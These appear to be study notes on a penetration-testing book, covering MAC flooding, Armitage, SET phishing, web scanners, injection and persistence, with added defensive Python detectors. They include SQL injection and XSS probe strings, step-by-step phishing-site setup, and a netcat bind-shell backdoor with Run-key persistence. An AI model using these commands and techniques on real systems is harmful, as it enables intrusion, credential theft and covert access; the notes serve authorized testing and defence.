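Since the notes say macof "causes a lot of noise and is easily detectable", here is what that detection looks like in code. This is an added example, not from the book: macof (part of dsniff) sends frames carrying random source MAC addresses until the switch's forwarding table overflows, so the tell-tale sign is the number of distinct source MACs seen in a short window jumping from a handful to thousands. The frame records are constructed to mimic a quiet network followed by a flood; the alert threshold is an assumption to tune per environment.

```python
"""Detect a MAC/CAM-table flood from a list of (timestamp, source_mac) frame records.

Added example, not from the book. Real input would come from a capture on the
switch port or a NIDS; here the frames are constructed: a quiet network with three
real hosts for 4 seconds, then a one-second burst of random source MACs.
"""
import random
from collections import defaultdict


def build_constructed_frames(seed=1):
    """Constructed sample traffic: normal chatter 0-4 s, flood burst 5-6 s."""
    rnd = random.Random(seed)
    real_hosts = ["00:0c:29:4a:1b:2c", "00:50:56:c0:00:08", "08:00:27:13:37:42"]
    frames = [(i * 0.02, rnd.choice(real_hosts)) for i in range(200)]
    for i in range(2000):
        mac = ":".join(f"{rnd.randrange(256):02x}" for _ in range(6))
        frames.append((5.0 + i * 0.0005, mac))
    return frames


def distinct_sources_per_window(frames, window=1.0):
    """Bucket frames into fixed-size time windows; count distinct source MACs per bucket."""
    buckets = defaultdict(set)
    for ts, mac in frames:
        buckets[int(ts // window)].add(mac)
    return {b: len(macs) for b, macs in sorted(buckets.items())}


def detect_mac_flood(frames, window=1.0, threshold=100):
    """Return [(window_start_seconds, distinct_mac_count)] for windows over the threshold.

    threshold is an assumption: a single access port legitimately shows only a few
    source MACs per second (virtual machines and hubs raise it), so 100 is generous.
    """
    counts = distinct_sources_per_window(frames, window)
    return [(b * window, n) for b, n in counts.items() if n > threshold]


if __name__ == "__main__":
    for start, n in detect_mac_flood(build_constructed_frames()):
        print(f"ALERT: {n} distinct source MACs in the window starting at t={start:.0f}s")
```

The same per-window count is what port-security features on managed switches enforce directly (a maximum number of learned MACs per port), which is the usual mitigation for this attack.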

Wireshark is sweet for viewing network traffic. Can restrict down to network cards and types p114.

Armitage – The Hail Mary

P117. Easy, but not remotely stealthy.

Armitage will bombard the target with every known exploit it has, even once it’s got in! You get an
easy-to-use GUI.

Armitage uses Metasploit, so Metasploit must be running (‘msfconsole’?).

Cmd: armitage

Use the GUI to do Hosts > Quick Scan (OS Detect)

Use the GUI to do Attacks > Hail Mary.

Screens with lightning bolts will appear. Click on them to get a shell. Can now upload programs to
the target and/or interact with it.

Social Engineering

Aim

Trick users into handing over their credentials.

SET – Social Engineering Toolkit

Has tons of features for tricking users.

Cmd: se-toolkit

Then follow the options:

1. Spear phishing – emails with malicious attachments. Hard to do these days.

2. Website Attack Vectors. A successful group of attacks. Use Java Applet attacks or credential
harvesters. Clones a webpage (e.g. the corporate site) then records what people enter when
they go to your spoof site rather than the original.
- Set up SET
- Register a domain (and even SSL!). Make sure the domain is believable, e.g.
survey-mycompany.com for mycompany.com.
- Email a few targeted people with a specific pretext and a link to the spoof site. Employee
satisfaction surveys with a prize or something like that might work.
- Get shells

3. Review the other options in this chapter, such as SMS spoofing.



Web Exploitation

Nikto – Web Server Vuln Scanning

Nikto is a web vulnerability scanner.

Cmd: nikto -h 192.168.18.132 -p 1-1000,8080

-h = target IP
-p = ports (if missing, it just scans 80)
-o = file path to save results

W3AF – Finding standard weaknesses

Easily identifies most web based vulns e.g. SQL Injection, XSS, file includes, CORS. Has a handy GUI

Cmd: w3af

Can use this against the OWASP TOP 10

When scanning, ensure the ‘error’ and ‘info’ check boxes are not ticked. We just want vulnerabilities.

If it finds something good, you may be able to exploit this from the exploits tab

Webscarab (Full Spidering)

Cmd: webscarab

In the GUI go to Tools > Use full featured interface. Restart the tool.

Set up a proxy in iceweasel (or any other browser):

- Edit > Preferences
- Advanced > Network > Settings
- ‘Manual HTTP proxy configuration’
- HTTP Proxy > 127.0.0.1
- Port 8008
- Check ‘use this proxy for all protocols’
- Start browsing as usual – you will get SSL warnings.

Certificate validation is the best defence against man-in-the-middle attacks like this; the SSL warnings are the browser noticing the proxy.

Now in the webscarab GUI, you will have options such as ‘spider tree’ (right click), which you can use
to look for info not readily available, hopefully confidential. May be able to change the requests
using the ‘intercept requests’ and ‘intercept responses’ check boxes.

ZAP Spidering, Proxies and Man-In-The-Middle

***(p160) Better for intercepting attacks is ZAP (Zed Attack Proxy). Configure the proxy as above,
but on port 8080.

Cmd: zap

This will really nicely intercept web traffic and allow you to edit the content sent (most importantly)
and received. Can choose the direction of the traffic you want to stop and tamper with. Some good
tests:

- Order -5 (negative 5) TVs
- Try altering prices
- Removing variables completely (e.g. a username and password variable – not just the
values, the variables themselves!)
- What if you try a cookie that’s different from the currently logged in user?
- …

Can right click on a request and do “spider site” for a larger attack surface (e.g. hidden, less well
validated, content)

Can also do vulnerability scans, where it will show you the weak pages for you to attack. This can be
passive (it just looks at the responses you get), or active, where it sends lots of malicious requests to
work out vulns for you to attack. Rapid requests are likely to raise alarm bells at the website’s end.
Results are in the ‘Alerts’ tab.

Injection attacks

Not much new here, though it can be quite effective against PHP services. You may be able to get in using
examples such as:

searchterm' or 1=1 --

' or 1=1 --

For searches and logins. If you can get this to work on a username, you might even end up with the
admin account!

XSS – Cross Site Scripting

Hard to do now. Basically try some JavaScript in input boxes, e.g. "<script>alert('ok')</script>".

Reflected XSS is returned to the user immediately. Stored XSS goes into the DB for execution at a
later point.
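Reflected XSS, as an added example that is not part of the notes: a search page that echoes the query back unescaped (the vulnerable form) beside the same page rendered through `html.escape` (the fix), plus a small defender-side check that flags the page's `<script>alert('ok')</script>` probe in URL-encoded access-log query strings. The page template and the log lines are constructed.

```python
"""Reflected XSS: vulnerable render vs escaped render, plus a log check.

Added example, not from the book. The template and the access-log lines are
constructed; the log format assumed here is simply 'METHOD PATH STATUS'.
"""
import html
import re
from urllib.parse import unquote_plus


def render_unsafe(term):
    """Echoes the search term straight into the page: whatever the user typed
    is handed to the browser as markup."""
    return f"<p>Results for: {term}</p>"


def render_safe(term):
    """html.escape turns < > & \" ' into entities, so the term is displayed as
    text and can no longer open a tag."""
    return f"<p>Results for: {html.escape(term, quote=True)}</p>"


SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_script_tag(text):
    """True if the text contains an actual (unescaped) script tag opener."""
    return bool(SCRIPT_TAG.search(text))


def flag_suspicious_queries(log_lines):
    """Return the raw request paths whose URL-decoded form contains a script tag.
    A cheap first-pass detection for XSS probing in web server logs."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        if contains_script_tag(unquote_plus(parts[1])):
            hits.append(parts[1])
    return hits


# Constructed log lines: one benign search and two XSS probes.
CONSTRUCTED_LOG = [
    "GET /search?q=laptops 200",
    "GET /search?q=%3Cscript%3Ealert(%27ok%27)%3C/script%3E 200",
    "GET /search?q=%3CSCRIPT+src%3D//x%3E 200",
]

if __name__ == "__main__":
    probe = "<script>alert('ok')</script>"
    print(render_unsafe(probe))
    print(render_safe(probe))
    print(flag_suspicious_queries(CONSTRUCTED_LOG))
```

Output encoding at the point where data meets HTML is the mitigation; the log check is only a tripwire, since real probes are often obfuscated well beyond a literal `<script` string.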

Post Exploitation – Maintaining Access

Aim
The aim is to be able to get back into an exploited machine even after reboots and shutdowns.

NetCat and CryptCat


P168 onwards.

Have access to Windows Target with meterpreter shell.

1. Upload netcat (the Windows version in this case)

meterpreter> upload nc.exe C:\\Windows\\system32

2. Once netcat has been uploaded, pick a port number, bind cmd.exe to it and start netcat in
server (listener) mode (run this from a command shell on the target):

nc -L -p 5777 -e cmd.exe

3. Add netcat to the registry to run on startup (need to look this up, but it could be something like):

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "My App" /t REG_SZ /F /D "C:\MyAppPath\MyApp.exe"

4. Connect a netcat client

nc target_ip 5777

5. You can now do as you please.

Review the docs for more info on this powerful tool.
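The Run-key persistence above is also one of the first places a defender looks, so here is the audit side of it as an added example (not from the book): a parser for the text that `reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` prints, flagging entries that launch a known netcat-family binary or that bind a command shell with `-e cmd.exe`. The registry output is constructed; feeding it saved output (or replacing the input with a `winreg` enumeration on a live host) is an assumption of this example, as is the indicator list.

```python
"""Audit Windows Run-key auto-start entries for planted listeners.

Added example, not from the book. Parses saved 'reg query ...\\Run' output so it
runs anywhere; the sample below is constructed. Indicator list is an assumption:
the netcat/cryptcat names from the notes plus Nmap's ncat, and the -e cmd.exe flag.
"""
import re

RUN_KEY = r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# Constructed 'reg query' output: one legitimate entry and two planted listeners.
CONSTRUCTED_REG_OUTPUT = rf"""
{RUN_KEY}
    OneDrive    REG_SZ    "C:\Users\jsmith\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    My App    REG_SZ    C:\Windows\system32\nc.exe -L -p 5777 -e cmd.exe
    Updater    REG_SZ    C:\Users\jsmith\AppData\Roaming\svc.exe -l 4444 -e cmd.exe
"""

# reg query indents each value: <name>  <type>  <data>, separated by runs of spaces.
ENTRY = re.compile(r"^\s{2,}(?P<name>.+?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.*)$")
SHELL_BIND = re.compile(r"\s-e\s+cmd(\.exe)?\b", re.IGNORECASE)
LISTENER_BINARIES = {"nc.exe", "ncat.exe", "cryptcat.exe"}


def parse_run_entries(text):
    """Return [{name, type, data}] for every value line in the reg query output."""
    return [m.groupdict() for m in map(ENTRY.match, text.splitlines()) if m]


def executable_name(data):
    """Lower-cased basename of the command's executable, quoted or not."""
    data = data.strip()
    if data.startswith('"'):
        exe = data[1:data.find('"', 1)]
    else:
        exe = data.split()[0] if data else ""
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def suspicious_entries(entries):
    """Return [(value_name, command, [reasons])] for entries matching an indicator."""
    findings = []
    for e in entries:
        reasons = []
        if executable_name(e["data"]) in LISTENER_BINARIES:
            reasons.append("known listener binary")
        if SHELL_BIND.search(e["data"]):
            reasons.append("binds a command shell (-e cmd.exe)")
        if reasons:
            findings.append((e["name"], e["data"], reasons))
    return findings


if __name__ == "__main__":
    for name, cmd, why in suspicious_entries(parse_run_entries(CONSTRUCTED_REG_OUTPUT)):
        print(f"[!] {name}: {cmd}\n    {', '.join(why)}")
```

The second constructed entry shows why name-matching alone is weak: a renamed netcat (`svc.exe`) slips past the binary list and is only caught by its `-e cmd.exe` arguments, and a real audit would also cover the HKLM Run/RunOnce keys, services and scheduled tasks.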

Rootkits

P174. Like HackerDefender. Works at a lower level than the OS, so can hide netcat and other
programs completely. Be careful if using these as they can be very dodgy! Amazingly powerful
though. Can use to keep back doors open, escalate privileges etc.

Never use a rootkit without specific permission from the client.
Most clients will not allow rootkits, and you might well be sacked for using one.

Defending against rootkits

To help defend against rootkits:

- Deprivilege your users.
- Closely monitor the info you put on the internet.
- Properly configure firewalls and other access controls.
- Patch systems.
- Install and use antivirus.
- Make use of an intrusion detection system.
- Monitor outbound traffic as well as inbound traffic.

Report

The most interesting bit as far as the client is concerned. Make it good for more work!

Remember to send it encrypted with something like TrueCrypt. They may need help with this. If
they’re dinosaurs and want a paper copy, make sure it’s signed for. An info leak at this point could
be terrible for the company and for your reputation.

Obviously, if a company asks for a sample report, never provide a redacted copy. Send them
something completely made up (but based on a true scenario)!

Executive Summary

2 pages max. Aimed at managers with no IT skills. General overview and highlight of any major
concerns.

Should reference sections of the detailed report for those needing a more in depth look.

Walkthrough Report

May want to provide a walkthrough report so the client can see the steps you took to compromise
the system. This could be part of the detailed report.

Detailed Report

Target – IT managers, IT Pros

Rank the vulns and start with most critical.

It’s ok to point out you couldn’t access a system if you can demonstrate there is potential and the
system is important.

Screenshots are good.

Mitigations, solutions and suggestions for fixing are usually googleable and are essential to the report.

It’s up to you/ the client whether you provide raw data. May want to sanitize it. Don’t use raw data
in the report. You can reference an appendix or separate report for raw data.

Make sure the raw data doesn’t have any silly ‘dev/hack test’ names/properties.

After Care

Remember the client will have questions, so helping them needs to be in the budget. They might
not be tech savvy. You need to find the line, but after care will affect whether they recommend you or
not. Maybe have a set amount of time agreed in the contract to start with?
